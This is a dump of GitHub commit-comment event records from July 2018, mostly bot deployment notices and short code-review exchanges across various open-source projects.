{"id":"7957130038","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29687236,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-12T15:49:32Z","updated_at":"2018-07-12T15:49:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T15:49:32Z"}
{"id":"7957131896","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29687239,"position":null,"line":null,"path":null,"commit_id":"f7ddba5d91aed1ce894ac48475aa19a4117ce326","created_at":"2018-07-12T15:49:51Z","updated_at":"2018-07-12T15:49:51Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-44](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-44).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-44-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T15:49:51Z"}
{"id":"7957131982","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29687240,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T15:49:52Z","updated_at":"2018-07-12T15:49:52Z","author_association":"MEMBER","body":"> I don't get it... The old theme was based on tango, but heavily customized. Did you replace my theme by vanilla tango or did you remove tango and replaced it by something else?\r\n\r\nVanilla tango. I was not aware you had some sort of tango in there. :)"}},"created_at":"2018-07-12T15:49:52Z"}
{"id":"7957137711","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29687250,"position":null,"line":null,"path":null,"commit_id":"4d600c0a2036877087e094c025f9bc07b892bd3f","created_at":"2018-07-12T15:50:49Z","updated_at":"2018-07-12T15:50:49Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-12T15:50:49Z"}
{"id":"7957139861","type":"CommitCommentEvent","actor":{"login":"newtratip"},"repo":{"name":"pabi2/pb2_addons"},"payload":{"comment":{"id":29687254,"position":5,"line":13,"path":"pabi_account_report/reports/xlsx_report_gl_payable.xml","commit_id":"16bdd2313150a8d4b0b3a11596dfb08c0fb4d893","created_at":"2018-07-12T15:51:10Z","updated_at":"2018-07-12T15:51:10Z","author_association":"CONTRIBUTOR","body":"เปลี่ยนเป็น user_type.name = 'Expense' ณ ตอนนี้ ภายหลังอาจจะมีการ config เพิ่มเติม ว่ารายงานนี้เป็นของ Expense เพื่อให้มัน flexible มากขึ้น ณ ตอนนี้ เหมือนเป็นการ hard code"}},"created_at":"2018-07-12T15:51:10Z"}
{"id":"7957152227","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29687280,"position":null,"line":null,"path":null,"commit_id":"4ac392ccb6bd594c2f3acaa6bef93e0a681f745c","created_at":"2018-07-12T15:53:13Z","updated_at":"2018-07-12T15:53:13Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-29](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-29).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-29-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-12T15:53:13Z"}
{"id":"7957152843","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29687285,"position":null,"line":null,"path":null,"commit_id":"72b8ca73f0539fb3bccf6cd23134bd3dfdaca015","created_at":"2018-07-12T15:53:19Z","updated_at":"2018-07-12T15:53:19Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-351](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-351).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-351-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T15:53:19Z"}
{"id":"7957152874","type":"CommitCommentEvent","actor":{"login":"JLLeitschuh"},"repo":{"name":"nielsfalk/ktor-swagger"},"payload":{"comment":{"id":29687286,"position":17,"line":35,"path":"ktor-swagger-root.gradle.kts","commit_id":"7949562bc5f027913008d4e2ea68751e0e73665b","created_at":"2018-07-12T15:53:19Z","updated_at":"2018-07-12T15:53:19Z","author_association":"COLLABORATOR","body":"Fixed."}},"created_at":"2018-07-12T15:53:19Z"}
{"id":"7957155450","type":"CommitCommentEvent","actor":{"login":"jonsterling"},"repo":{"name":"RedPRL/redtt"},"payload":{"comment":{"id":29687290,"position":null,"line":null,"path":null,"commit_id":"895bc2e7a68221775d622b1e328c436724ddc80f","created_at":"2018-07-12T15:53:44Z","updated_at":"2018-07-12T15:53:44Z","author_association":"COLLABORATOR","body":"OK! I'm fine with merging. "}},"created_at":"2018-07-12T15:53:44Z"}
{"id":"7957163635","type":"CommitCommentEvent","actor":{"login":"arianzehtab"},"repo":{"name":"arianzehtab/test1"},"payload":{"comment":{"id":29687306,"position":5,"line":5,"path":"README.md","commit_id":"5c7d99ed0205fd57836b22943e179df6f94ec8b6","created_at":"2018-07-12T15:55:07Z","updated_at":"2018-07-12T15:55:07Z","author_association":"OWNER","body":"U are cool"}},"created_at":"2018-07-12T15:55:07Z"}
{"id":"7957164275","type":"CommitCommentEvent","actor":{"login":"YTiStrafeNubzHD"},"repo":{"name":"YTiStrafeNubzHD/ManyWorlds"},"payload":{"comment":{"id":29687308,"position":null,"line":null,"path":null,"commit_id":"b3c0da0aeef74474cea798efb946276c4e03e1a3","created_at":"2018-07-12T15:55:13Z","updated_at":"2018-07-12T15:55:13Z","author_association":"OWNER","body":"fixes #2 "}},"created_at":"2018-07-12T15:55:13Z"}
{"id":"7957166117","type":"CommitCommentEvent","actor":{"login":"craigharvi3"},"repo":{"name":"bbc/webpack-s3-uploader"},"payload":{"comment":{"id":29687311,"position":4,"line":6,"path":"package.json","commit_id":"a9bcd3e7a71b420aac84b0d7466dd1e85757d26a","created_at":"2018-07-12T15:55:30Z","updated_at":"2018-07-12T15:55:30Z","author_association":"COLLABORATOR","body":"Sorted mate 981af5aafc389b0298186f9e1d208178af927472"}},"created_at":"2018-07-12T15:55:30Z"}
{"id":"7957166648","type":"CommitCommentEvent","actor":{"login":"liuwei0376"},"repo":{"name":"liuwei0376/python3_toturial"},"payload":{"comment":{"id":29687312,"position":null,"line":null,"path":null,"commit_id":"21febe6d83e7e96e7dba75a9ca4a93f2a5d061f0","created_at":"2018-07-12T15:55:36Z","updated_at":"2018-07-12T15:55:36Z","author_association":"OWNER","body":"haha,delete 3 files"}},"created_at":"2018-07-12T15:55:36Z"}
{"id":"7957172310","type":"CommitCommentEvent","actor":{"login":"liuwei0376"},"repo":{"name":"liuwei0376/python3_toturial"},"payload":{"comment":{"id":29687320,"position":null,"line":null,"path":null,"commit_id":"21febe6d83e7e96e7dba75a9ca4a93f2a5d061f0","created_at":"2018-07-12T15:56:32Z","updated_at":"2018-07-12T15:56:32Z","author_association":"OWNER","body":"我添加了第二条评论\r\n"}},"created_at":"2018-07-12T15:56:32Z"}
{"id":"7957175739","type":"CommitCommentEvent","actor":{"login":"raxbg"},"repo":{"name":"sabberworm/PHP-CSS-Parser"},"payload":{"comment":{"id":29687324,"position":10,"line":493,"path":"lib/Sabberworm/CSS/Parser.php","commit_id":"92abffafb1190d1c7d169c71e762dc1ac0f91ee4","created_at":"2018-07-12T15:57:07Z","updated_at":"2018-07-12T15:57:07Z","author_association":"CONTRIBUTOR","body":"Yes, thanks, and this will also properly throw an exception in non lenient mode. However in lenient mode, I think we can suppress this and just use an empty `$sName`. We should also support multiple identifiers separated by whitespace. I will submit new changes for review soon."}},"created_at":"2018-07-12T15:57:07Z"}
{"id":"7957180076","type":"CommitCommentEvent","actor":{"login":"praveenkum"},"repo":{"name":"BalajiAnand/congurentDPweb"},"payload":{"comment":{"id":29687328,"position":null,"line":null,"path":null,"commit_id":"e493d2d2dbb3068937f59e45b20592af42233b80","created_at":"2018-07-12T15:57:50Z","updated_at":"2018-07-12T15:57:50Z","author_association":"COLLABORATOR","body":"did some changes in ream me file"}},"created_at":"2018-07-12T15:57:50Z"}
{"id":"7957180183","type":"CommitCommentEvent","actor":{"login":"felipemontoya"},"repo":{"name":"eduNEXT/edx-platform"},"payload":{"comment":{"id":29687329,"position":14,"line":24,"path":"cms/static/js/features_jsx/studio/CourseOrLibraryListing.jsx","commit_id":"7063b4683076cb8cde0db013467de45f4b2289ec","created_at":"2018-07-12T15:57:51Z","updated_at":"2018-07-12T15:57:51Z","author_association":"MEMBER","body":"Could you make it so, that if real_org and org are not the same, both are displayed. One of them might be in parenthesis. E.g. `org (real_org) / course_id / course_run`"}},"created_at":"2018-07-12T15:57:51Z"}
{"id":"7957180660","type":"CommitCommentEvent","actor":{"login":"prasadakula1"},"repo":{"name":"prasadakula1/waffletest"},"payload":{"comment":{"id":29687331,"position":null,"line":null,"path":null,"commit_id":"098b0212b9fe08190d269b2510d61b4dd22b3ada","created_at":"2018-07-12T15:57:56Z","updated_at":"2018-07-12T15:57:56Z","author_association":"OWNER","body":"close #14 "}},"created_at":"2018-07-12T15:57:56Z"}
{"id":"7957181554","type":"CommitCommentEvent","actor":{"login":"tioguda"},"repo":{"name":"tioguda/manjariando"},"payload":{"comment":{"id":29687333,"position":null,"line":null,"path":null,"commit_id":"6e9e6792c151bf3e6bfc84ac88ea6b323cb78bed","created_at":"2018-07-12T15:58:05Z","updated_at":"2018-07-12T15:58:05Z","author_association":"OWNER","body":"@InternalError503 I will be keeping Cyberfox in this repository for the Manjaro Linux distribution, so users can always install the latest version available."}},"created_at":"2018-07-12T15:58:05Z"}
{"id":"7957182461","type":"CommitCommentEvent","actor":{"login":"MARIOBASZ"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29687336,"position":null,"line":null,"path":null,"commit_id":"a59a29c56612e9b1df2f217649ead1d6b9d55f9c","created_at":"2018-07-12T15:58:14Z","updated_at":"2018-07-12T15:58:14Z","author_association":"CONTRIBUTOR","body":"icon"}},"created_at":"2018-07-12T15:58:14Z"}
{"id":"7957184310","type":"CommitCommentEvent","actor":{"login":"ItsEddie"},"repo":{"name":"discosultan/penumbra"},"payload":{"comment":{"id":29687338,"position":null,"line":null,"path":null,"commit_id":"ac60beebab5e720defa6ebee8f21900f63f57d18","created_at":"2018-07-12T15:58:33Z","updated_at":"2018-07-12T15:58:33Z","author_association":"NONE","body":"Yes, that has resolved this particular issue.  I think it's good to also apply this solution in LightMapRenderer.cs and LightRenderer.cs!"}},"created_at":"2018-07-12T15:58:33Z"}
{"id":"7957184695","type":"CommitCommentEvent","actor":{"login":"CobaltWolf"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29687339,"position":null,"line":null,"path":null,"commit_id":"3b6950b65afa65d2b4d20590ac51fff24d1605a8","created_at":"2018-07-12T15:58:37Z","updated_at":"2018-07-12T15:58:37Z","author_association":"OWNER","body":"No, there's no colliders on the AJ-60's pegs. They're just for visual alignment. I hoped they wouldn't look too out of place on other crafts. Though, they perhaps could be a touch longer to make sure they make contact with other tanks. \r\n\r\nAlright. It'll probably have to be a multi-pronged approach on the Centaur. Make the model for the interstage thinner along with the colliders, resize the RCS... I'll have to also test all this stuff with the DEC mount.\r\n\r\nI realized near the end of last night the model wasn't centered on the vertical axis, but I wasn't feeling well (as well as the last couple of days) so I decided to just throw it up. Do whatever you want for the attach position, I'll be able to translate whatever change you make to the new position."}},"created_at":"2018-07-12T15:58:37Z"}
{"id":"7957184793","type":"CommitCommentEvent","actor":{"login":"klondikemarlen"},"repo":{"name":"elthran/BookingSystem"},"payload":{"comment":{"id":29687340,"position":18,"line":73,"path":"booking/models/businesses.py","commit_id":"5ba32c8ada7ab5dac8a72fb39df3b6a0ef5cd540","created_at":"2018-07-12T15:58:38Z","updated_at":"2018-07-12T15:58:38Z","author_association":"COLLABORATOR","body":"from datetime import datetime\r\n\r\ndatetime_object = datetime.strptime('{:04} {:02} {:02}'.format(year, month, day), '%Y %m %d')"}},"created_at":"2018-07-12T15:58:38Z"}
{"id":"7957185197","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29687342,"position":null,"line":null,"path":null,"commit_id":"c8f4f0c345445d3c19fb746840ca16c3f8991a15","created_at":"2018-07-12T15:58:42Z","updated_at":"2018-07-12T15:58:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-43](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-43).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-43-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T15:58:42Z"}
{"id":"7957185855","type":"CommitCommentEvent","actor":{"login":"tmbb"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29687345,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T15:58:49Z","updated_at":"2018-07-12T15:58:49Z","author_association":"CONTRIBUTOR","body":"> Vanilla tango. I was not aware you had some sort of tango in there. :)\r\n\r\nThe day-mode theme is based on Tango (with some customizations) and the night-mode theme is based on Paraíso Dark (you replaced it by monokai or something, right?). I've called the mixture the Samba theme (in ExDocMakeup's docs, IIRC), because Paraíso Dark comes from color palette of the used by a (very NSFW) Brazilian artist (and because Tango is a dance lol).\r\n\r\nDid you take a look at the phoenix docs rendered using the old (Samba) theme? (for example, here: https://tmbb.github.io/phoenix/controllers.html#content) I think it blends in pretty well with the outer ExDoc's theme and more or less respects the Tango palette."}},"created_at":"2018-07-12T15:58:49Z"}
{"id":"7957187132","type":"CommitCommentEvent","actor":{"login":"NeatElves"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29687349,"position":null,"line":null,"path":null,"commit_id":"0a3e5dd645bd5ce4b4674485479819391e5830d5","created_at":"2018-07-12T15:59:02Z","updated_at":"2018-07-12T15:59:02Z","author_association":"CONTRIBUTOR","body":"Fill error 205_chess_fixes.sql & spell_template not found ))"}},"created_at":"2018-07-12T15:59:02Z"}
{"id":"7957195562","type":"CommitCommentEvent","actor":{"login":"discosultan"},"repo":{"name":"discosultan/penumbra"},"payload":{"comment":{"id":29687366,"position":null,"line":null,"path":null,"commit_id":"ac60beebab5e720defa6ebee8f21900f63f57d18","created_at":"2018-07-12T16:00:27Z","updated_at":"2018-07-12T16:00:27Z","author_association":"OWNER","body":"You are right, I had completely forgotten about those!"}},"created_at":"2018-07-12T16:00:27Z"}
{"id":"7957202015","type":"CommitCommentEvent","actor":{"login":"Reception123"},"repo":{"name":"miraheze/ManageWiki"},"payload":{"comment":{"id":29687380,"position":null,"line":null,"path":null,"commit_id":"63a3b822a841edf078443ca11d9de8fdc2f4e394","created_at":"2018-07-12T16:01:28Z","updated_at":"2018-07-12T16:01:28Z","author_association":"MEMBER","body":"@JohnFLewis @paladox The only issue with this is that (as you can see on test1wiki) the extensions changed do not show up in the log for some reason. I think it might be because I accidentally removed something important that existed in the original Special:ManageWiki but I'm not sure what"}},"created_at":"2018-07-12T16:01:28Z"}
{"id":"7957202341","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29687381,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T16:01:31Z","updated_at":"2018-07-12T16:01:31Z","author_association":"MEMBER","body":"I think if we change phoenix docs we will end up being very similar to what we have as I:\r\n\r\n1. would change the prompt and comments\r\n2. remove all the bolds\r\n\r\nit may be simpler to catch this one up. Dunno."}},"created_at":"2018-07-12T16:01:31Z"}
{"id":"7957203241","type":"CommitCommentEvent","actor":{"login":"natir"},"repo":{"name":"biokit/bioconvert"},"payload":{"comment":{"id":29687382,"position":null,"line":null,"path":null,"commit_id":"b86538eb9f559029ffe59f79adf82e3c82620a9d","created_at":"2018-07-12T16:01:41Z","updated_at":"2018-07-12T16:01:41Z","author_association":"NONE","body":"Hello\r\n\r\nI think get_compression_format need return an enumeration in place of a string, something like : \r\n```python\r\nfrom enum import Enum\r\n\r\nclass CompressionFormat(Enum):\r\n    GZIP\r\n    BZIP\r\n    7Z\r\n    XZ\r\n    ZIP\r\n   UNKNOW\r\n```\r\n\r\nAnd add bzip2 it's probably a good idea !"}},"created_at":"2018-07-12T16:01:41Z"}
{"id":"7957204039","type":"CommitCommentEvent","actor":{"login":"naverus"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29687387,"position":115,"line":381,"path":"app/arpa_components/arpa-bus-models/arpa-bus-model-form/arpa-bus-model-form.html","commit_id":"989decde5d444cb7266a19a2ce5d08f946114397","created_at":"2018-07-12T16:01:50Z","updated_at":"2018-07-12T16:01:50Z","author_association":"OWNER","body":"hmmm no veo errores ortograficos..."}},"created_at":"2018-07-12T16:01:50Z"}
{"id":"7957205344","type":"CommitCommentEvent","actor":{"login":"klondikemarlen"},"repo":{"name":"elthran/BookingSystem"},"payload":{"comment":{"id":29687392,"position":18,"line":73,"path":"booking/models/businesses.py","commit_id":"5ba32c8ada7ab5dac8a72fb39df3b6a0ef5cd540","created_at":"2018-07-12T16:02:04Z","updated_at":"2018-07-12T16:02:04Z","author_association":"COLLABORATOR","body":"Or if you are using 2 digit years change the year fields to: '{:02}' -> '%y'"}},"created_at":"2018-07-12T16:02:04Z"}
{"id":"7957208500","type":"CommitCommentEvent","actor":{"login":"Sekva"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29687402,"position":7,"line":46,"path":"site/app/User.php","commit_id":"5902fd3f595e783058e7f20975c54a4d3280e77c","created_at":"2018-07-12T16:02:36Z","updated_at":"2018-07-12T16:02:36Z","author_association":"OWNER","body":"gg\r\n"}},"created_at":"2018-07-12T16:02:36Z"}
{"id":"7957211770","type":"CommitCommentEvent","actor":{"login":"coderanger"},"repo":{"name":"chefspec/chefspec"},"payload":{"comment":{"id":29687410,"position":null,"line":null,"path":null,"commit_id":"b2afbc531492487084912ad40ce4ba307227e3ee","created_at":"2018-07-12T16:03:12Z","updated_at":"2018-07-12T16:03:12Z","author_association":"CONTRIBUTOR","body":"I don't think Travis works the way you think it does. This will not work AFAIK :)"}},"created_at":"2018-07-12T16:03:12Z"}
{"id":"7957215962","type":"CommitCommentEvent","actor":{"login":"naverus"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29687417,"position":60,"line":60,"path":"app/arpa_components/arpa-model-editor/arpa-model-editor.html","commit_id":"989decde5d444cb7266a19a2ce5d08f946114397","created_at":"2018-07-12T16:03:54Z","updated_at":"2018-07-12T16:03:54Z","author_association":"OWNER","body":"Solucionado."}},"created_at":"2018-07-12T16:03:54Z"}
{"id":"7957218806","type":"CommitCommentEvent","actor":{"login":"discosultan"},"repo":{"name":"discosultan/penumbra"},"payload":{"comment":{"id":29687421,"position":null,"line":null,"path":null,"commit_id":"ac60beebab5e720defa6ebee8f21900f63f57d18","created_at":"2018-07-12T16:04:18Z","updated_at":"2018-07-12T16:04:18Z","author_association":"OWNER","body":"There, https://github.com/discosultan/penumbra/commit/3caf48a793e4993e16c1f0f52da6fe4388468753."}},"created_at":"2018-07-12T16:04:18Z"}
{"id":"7957218812","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29687422,"position":null,"line":null,"path":null,"commit_id":"056e454d6a1fa07413a19046ef3217492c7b89a0","created_at":"2018-07-12T16:04:18Z","updated_at":"2018-07-12T16:04:18Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-160418 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-160418\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:04:18Z"}
{"id":"7957219093","type":"CommitCommentEvent","actor":{"login":"elwazana"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29687423,"position":7,"line":581,"path":"CaseStudies/glass/docs/SRS/glassbr_srs.tex","commit_id":"92672a859d8613018719e343a7a22597087230c7","created_at":"2018-07-12T16:04:21Z","updated_at":"2018-07-12T16:04:21Z","author_association":"COLLABORATOR","body":"This is the commit with the requested change: 41dad543d0a3695fcbcd9391c3ecf45224e627c8"}},"created_at":"2018-07-12T16:04:21Z"}
{"id":"7957219748","type":"CommitCommentEvent","actor":{"login":"albandescottes"},"repo":{"name":"JeffreyGoncalves/OldAvatar"},"payload":{"comment":{"id":29687425,"position":null,"line":null,"path":null,"commit_id":"1f9f2d0a75f54107a5ce55d1b2cdf37333150159","created_at":"2018-07-12T16:04:27Z","updated_at":"2018-07-12T16:04:27Z","author_association":"COLLABORATOR","body":"Update of Livecharts NuGet"}},"created_at":"2018-07-12T16:04:27Z"}
{"id":"7957220077","type":"CommitCommentEvent","actor":{"login":"jjasghar"},"repo":{"name":"chefspec/chefspec"},"payload":{"comment":{"id":29687427,"position":null,"line":null,"path":null,"commit_id":"b2afbc531492487084912ad40ce4ba307227e3ee","created_at":"2018-07-12T16:04:30Z","updated_at":"2018-07-12T16:04:30Z","author_association":"NONE","body":"I updated it ;)"}},"created_at":"2018-07-12T16:04:30Z"}
{"id":"7957222011","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29687433,"position":null,"line":null,"path":null,"commit_id":"3cfab9f6a9319edc3bfd88af1ed26bdb72962da4","created_at":"2018-07-12T16:04:47Z","updated_at":"2018-07-12T16:04:47Z","author_association":"MEMBER","body":"Awesome, @vak2ve!  Thank you!"}},"created_at":"2018-07-12T16:04:47Z"}
{"id":"7957223911","type":"CommitCommentEvent","actor":{"login":"naverus"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29687435,"position":150,"line":150,"path":"app/arpa_components/arpa-model-editor/arpa-model-editor.html","commit_id":"989decde5d444cb7266a19a2ce5d08f946114397","created_at":"2018-07-12T16:05:05Z","updated_at":"2018-07-12T16:05:05Z","author_association":"OWNER","body":"Corregido."}},"created_at":"2018-07-12T16:05:05Z"}
{"id":"7957229508","type":"CommitCommentEvent","actor":{"login":"cycomachead"},"repo":{"name":"bromagosa/Snippets"},"payload":{"comment":{"id":29687443,"position":36,"line":85,"path":"build.sh","commit_id":"32737d8e61b9704e3b9483a7325c11ac26f2b8e7","created_at":"2018-07-12T16:06:00Z","updated_at":"2018-07-12T16:06:00Z","author_association":"NONE","body":"If this works it’s fine 🙂, though it looks to me like if we didn’t use -o then the only conditional would be -I vs -I. \r\n"}},"created_at":"2018-07-12T16:06:00Z"}
{"id":"7957229840","type":"CommitCommentEvent","actor":{"login":"naverus"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29687444,"position":206,"line":206,"path":"app/arpa_components/arpa-model-editor/arpa-model-editor.html","commit_id":"989decde5d444cb7266a19a2ce5d08f946114397","created_at":"2018-07-12T16:06:04Z","updated_at":"2018-07-12T16:06:04Z","author_association":"OWNER","body":"El elemento que genera el evento, envia los parametros en ese orden... Nada que hacer al respecto."}},"created_at":"2018-07-12T16:06:04Z"}
{"id":"7957234174","type":"CommitCommentEvent","actor":{"login":"naverus"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29687448,"position":107,"line":373,"path":"app/arpa_components/arpa-bus-models/arpa-bus-model-form/arpa-bus-model-form.html","commit_id":"989decde5d444cb7266a19a2ce5d08f946114397","created_at":"2018-07-12T16:06:48Z","updated_at":"2018-07-12T16:06:48Z","author_association":"OWNER","body":"Esa es la notación que usa Polymer. 👍 "}},"created_at":"2018-07-12T16:06:48Z"}
{"id":"7957234925","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29687449,"position":null,"line":null,"path":null,"commit_id":"ab6a39499ce969607b9e49b3de32d2235c4654a8","created_at":"2018-07-12T16:06:56Z","updated_at":"2018-07-12T16:06:56Z","author_association":"NONE","body":"@MJZ1977 \r\nhave you forgot to push the bugfix?"}},"created_at":"2018-07-12T16:06:56Z"}
{"id":"7957241312","type":"CommitCommentEvent","actor":{"login":"tmbb"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29687459,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T16:08:01Z","updated_at":"2018-07-12T16:08:01Z","author_association":"CONTRIBUTOR","body":"> would change the prompt and comments\r\n\r\nSure, no problem\r\n\r\n> remove all the bolds\r\n\r\nAgain, no problem.\r\n\r\nThe main difference is the distinction between atoms (orange), sigils (also orange, but I'm thinking of making them brown) and strings (green)"}},"created_at":"2018-07-12T16:08:01Z"}
{"id":"7957251287","type":"CommitCommentEvent","actor":{"login":"Ivanca"},"repo":{"name":"eduNEXT/edx-platform"},"payload":{"comment":{"id":29687472,"position":14,"line":24,"path":"cms/static/js/features_jsx/studio/CourseOrLibraryListing.jsx","commit_id":"7063b4683076cb8cde0db013467de45f4b2289ec","created_at":"2018-07-12T16:09:41Z","updated_at":"2018-07-12T16:09:41Z","author_association":"MEMBER","body":"Done"}},"created_at":"2018-07-12T16:09:41Z"}
{"id":"7957253124","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29687477,"position":null,"line":null,"path":null,"commit_id":"b965eb6c3fa94021faef10d0629c7b77d2b115b8","created_at":"2018-07-12T16:10:00Z","updated_at":"2018-07-12T16:10:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-161000 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-161000\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:10:00Z"}
{"id":"7957255436","type":"CommitCommentEvent","actor":{"login":"Snow-Pyon"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29687480,"position":null,"line":null,"path":null,"commit_id":"cba65526a60debfd9ad1c1a34b55c022b6bca37a","created_at":"2018-07-12T16:10:24Z","updated_at":"2018-07-12T16:10:24Z","author_association":"MEMBER","body":"Should I disallow it after setting fly or just a documentation change?"}},"created_at":"2018-07-12T16:10:24Z"}
